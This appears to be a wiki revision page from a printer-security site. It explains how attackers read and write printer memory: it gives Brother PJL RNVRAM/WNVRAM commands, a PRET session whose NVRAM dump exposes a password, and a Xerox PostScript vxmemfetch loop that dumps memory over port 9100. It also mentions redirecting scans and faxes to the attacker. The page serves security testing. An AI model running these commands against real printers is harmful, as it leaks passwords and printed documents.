Difference between revisions of "Memory access"

From Hacking Printers
Jump to: navigation, search
Line 20: Line 20:
 
  printer:/> nvram dump
 
  printer:/> nvram dump
 
  Writing copy to nvram/printer
 
  Writing copy to nvram/printer
................................................................................
 
 
  ................................................................................
 
  ................................................................................
 
  ................................................................................
 
  ................................................................................

Revision as of 12:38, 21 January 2017

If an attacker gains access to the printer's memory or NVRAM, she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead to code execution.

PJL (Brother)

For PJL, a vendor-specific command documented in the Brother laser printer product specifications [1] and discussed by [2] allows to ‘write data to or retrieve data from the specified address of the printer's NVRAM’. This functionality can be abused to access arbitrary NVRAM addresses using PJL as shown below, where X is an integer, which can be incremented to dump the whole NVRAM.

@PJL RNVRAM ADDRESS = X              (read byte at location X)
@PJL WNVRAM ADDRESS = X DATA = Y     (write byte Y to location X)

This leads to disclosure of embedded web server passwords stored in the printer's NVRAM. Furthermore – if set – user PINs, passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker can change the Scan-to-FTP settings so scanned documents are delivered to an attacker-controlled FTP server or she can exchange fax numbers in the address book whereby fax is sent to the attacker's fax number instead.

How to test for this attack?

The feasibility of this attack, which has been implemented as the nvram command in PRET can be tested as follows:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> nvram dump
Writing copy to nvram/printer
................................................................................
................................................................................
............................................MyS3cretPassw0rd....................
................................................................................

Who can perform this attack?

Anyone who can print, for example through USB drive or cable, Port 9100 printing or Cross-site printing.

PostScript (Xerox)

Certain Xerox printer models have a proprietary PostScript vxmemfetch operator built into, which allows an attacker to read arbitrary memory addresses. Using a PostScript loop, this feature can be easily used to dump the whole memory [3] as show below:

/counter 0 def 50000 {
  /counter counter 1 add def
  currentdict /RRCustomProcs /ProcSet findresource begin
  begin counter 1 false vxmemfetch end end == counter
} repeat

How to test for this attack?

Open a raw network connection (using netcat [4], for example) to port 9100/tcp of the printer and send the PostScript code documented above.

Who can perform this attack?

Anyone who can print, for example through USB drive or cable, Port 9100 printing or Cross-site printing.



  1. Brother Laser Printer Technical Reference Guide, Ver. H, Brother Industries Ltd., 2004
  2. Hacking printers: for fun and profit, A. Costin, Hack.lu, 2010
  3. PostScript: Danger Ahead?!, A. Costin, Hack in Paris, 2012
  4. Netcat – TCP/IP Swiss Army Knife, Hobbit, 1996